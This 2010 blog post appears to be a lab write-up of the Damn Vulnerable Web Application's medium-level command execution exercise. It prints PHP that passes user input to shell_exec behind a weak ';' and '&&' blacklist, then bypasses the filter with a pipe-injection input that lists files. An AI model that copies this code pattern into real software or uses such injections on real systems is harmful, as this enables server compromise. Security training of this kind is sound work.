Command Execution Part 2…

June 11, 2010 at 6:21 am (Command Execution, PHP, Security)

Hey guys,

So I finally got around to playing with the Damn Vulnerable Web Application on Medium level. The command execution level really only added a filter for two characters as a “more secure” version to the level on low setting. Lets take a look at the code:

<?php

if( isset( $_POST[ ‘submit’] ) ) {

$target = $_REQUEST[ ‘ip’ ];

// Remove any of the charactars in the array (blacklist).
$substitutions = array(
‘&&’ => ”,
‘;’ => ”,
);

$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.
if (stristr(php_uname(‘s’), ‘Windows NT’)) {

$cmd = shell_exec( ‘ping ‘ . $target );
echo ‘<pre>’.$cmd.'</pre>’;

} else {

$cmd = shell_exec( ‘ping -c 3 ‘ . $target );
echo ‘<pre>’.$cmd.'</pre>’;

}
}

?>

As you can see, they have added a character filter which filters out the following characters: ‘;’ and ‘&&’, the code that does this is here:

$substitutions = array(
'&&' => '',
';' => '',
);

Well what about the other plethora of bash commands ay? Such as.. well you guessed it the famous pipe operator: ‘|’. Lets see what happens when we try using it:

I entered: “127.0.0.1 | ls -l”, however you could just do: “| ls -l”, and I got returned:

total 12
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 help
-rw-r--r-- 1 www-data www-data 1509 Feb 17 15:17 index.php
-rw-r--r-- 1 www-data www-data 0 Jun 9 08:37 ls
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 source

Viola!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: